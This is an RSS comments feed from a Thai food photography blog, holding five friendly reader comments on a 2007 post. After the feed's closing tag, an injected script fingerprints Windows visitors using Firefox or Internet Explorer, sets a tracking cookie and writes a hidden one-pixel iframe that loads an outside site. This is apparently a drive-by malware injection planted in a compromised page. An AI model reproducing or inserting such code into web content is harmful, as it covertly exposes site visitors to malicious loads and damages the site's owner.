<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Ratana</title>
	<atom:link href="http://www.austinbushphotography.com/2007/02/ratana.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/ratana.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Pat</title>
		<link>http://www.austinbushphotography.com/blog/ratana.html#comment-611</link>
		<dc:creator>Pat</dc:creator>
		<pubDate>Thu, 01 Mar 2007 01:16:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/02/ratana.html#comment-611</guid>
		<description>The last dish does indeed look amazing! I&#039;ve never seen anything like this in L.A. Once again, beautiful photos too.</description>
		<content:encoded><![CDATA[<p>The last dish does indeed look amazing! I&#8217;ve never seen anything like this in L.A. Once again, beautiful photos too.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Try Thai Food</title>
		<link>http://www.austinbushphotography.com/blog/ratana.html#comment-603</link>
		<dc:creator>Try Thai Food</dc:creator>
		<pubDate>Mon, 26 Feb 2007 03:35:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/02/ratana.html#comment-603</guid>
		<description>Hi Austin, I saw you on an interview site and now here at your site. COOL stuff. My g/f has a Thai food blog too, and maybe you both could link in the blogroll. She does it all herself and it&#039;s not bad! I like your photos - very nice use of selective depth of field. Her site is TryThaiFood.blogspot.com her name is Joy. If you get a chance, stop over and see her stuff and write her if you want to exchange links. Ok - good luck here in Thailand</description>
		<content:encoded><![CDATA[<p>Hi Austin, I saw you on an interview site and now here at your site. COOL stuff. My g/f has a Thai food blog too, and maybe you both could link in the blogroll. She does it all herself and it&#8217;s not bad! I like your photos &#8211; very nice use of selective depth of field. Her site is TryThaiFood.blogspot.com her name is Joy. If you get a chance, stop over and see her stuff and write her if you want to exchange links. Ok &#8211; good luck here in Thailand</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: team BSG</title>
		<link>http://www.austinbushphotography.com/blog/ratana.html#comment-601</link>
		<dc:creator>team BSG</dc:creator>
		<pubDate>Sun, 25 Feb 2007 11:02:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/02/ratana.html#comment-601</guid>
		<description>looks just great !a pity none like them in KL.</description>
		<content:encoded><![CDATA[<p>looks just great !a pity none like them in KL.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Anonymous</title>
		<link>http://www.austinbushphotography.com/blog/ratana.html#comment-599</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Thu, 22 Feb 2007 00:02:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/02/ratana.html#comment-599</guid>
		<description>Here&#039;s a bunch of Thai cooking videos with recipes if anyone is interested&lt;br/&gt;http://www.thaifoodtonight.com/thaifoodtonight/recipes.htm</description>
		<content:encoded><![CDATA[<p>Here&#8217;s a bunch of Thai cooking videos with recipes if anyone is interested<br /><a href="http://www.thaifoodtonight.com/thaifoodtonight/recipes.htm" rel="nofollow">http://www.thaifoodtonight.com/thaifoodtonight/recipes.htm</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Brigitte</title>
		<link>http://www.austinbushphotography.com/blog/ratana.html#comment-597</link>
		<dc:creator>Brigitte</dc:creator>
		<pubDate>Wed, 21 Feb 2007 08:39:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2007/02/ratana.html#comment-597</guid>
		<description>The last dish looks delicious. I think I&#039;m going to look for a adequate recipe to try it. We had &lt;a HREF=&quot;http://gigis-rezepte.blogspot.com/2007/02/nach-dem-3-zwischenspiel.html#gnbeefcurry&quot; REL=&quot;nofollow&quot;&gt;green beef curry&lt;/a&gt; recently and it was yummi. Like almost every thai dish.</description>
		<content:encoded><![CDATA[<p>The last dish looks delicious. I think I&#8217;m going to look for a adequate recipe to try it. We had <a HREF="http://gigis-rezepte.blogspot.com/2007/02/nach-dem-3-zwischenspiel.html#gnbeefcurry" REL="nofollow">green beef curry</a> recently and it was yummi. Like almost every thai dish.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

